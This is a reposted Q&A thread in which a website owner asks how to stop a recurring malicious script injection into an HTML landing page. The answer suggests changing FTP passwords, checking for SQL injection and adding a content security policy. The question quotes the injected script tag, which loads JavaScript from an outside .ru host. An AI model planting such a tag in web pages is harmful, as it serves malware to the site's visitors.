doze79040 2015-02-19 10:59
浏览 38

如何保护html网站不插入恶意软件js内容? [关闭]

I ve got hosting with a lot of websites in root folder. Of course, many of them have old engine and CMS version. Many folders are assigned to another domain.

One of the website has just html+css landing page. And every week there appears almost the same javascript line:

<!--9c3bd3--><script type="text/javascript" src="http://giagaga.ru/2wcgz6nk.php?id=3836829"></script><!--/9c3bd3-->

I remove, but it happens again. Moreover, when I enter site there is red screen and Google says malware detected (because of this js script).

How can I secure my html website? Maybe add something to .htaccess?

  • 写回答

1条回答 默认 最新

  • doz95923 2015-02-19 12:24
    关注

    If your site allows users to input data then you may have a problem with SQL injection. Here's some documentation:

    If the problem is an uploaded script then someone may have FTP access, you might consider changing your password for that if you haven't already. However if you already have changed your password and your site doesn't allow user input you can setup a content security policy that would only allow scripts load from your site to work http://giagaga.ru/2wcgz6nk.php?id=3836829 would not load on the page.

    Image taken from the HTML5Rocks tutorial page

    评论

报告相同问题?

悬赏问题

  • ¥100 任意维数的K均值聚类
  • ¥15 stamps做sbas-insar,时序沉降图怎么画
  • ¥15 unity第一人称射击小游戏,有demo,在原脚本的基础上进行修改以达到要求
  • ¥15 买了个传感器,根据商家发的代码和步骤使用但是代码报错了不会改,有没有人可以看看
  • ¥15 关于#Java#的问题,如何解决?
  • ¥15 加热介质是液体,换热器壳侧导热系数和总的导热系数怎么算
  • ¥100 嵌入式系统基于PIC16F882和热敏电阻的数字温度计
  • ¥15 cmd cl 0x000007b
  • ¥20 BAPI_PR_CHANGE how to add account assignment information for service line
  • ¥500 火焰左右视图、视差(基于双目相机)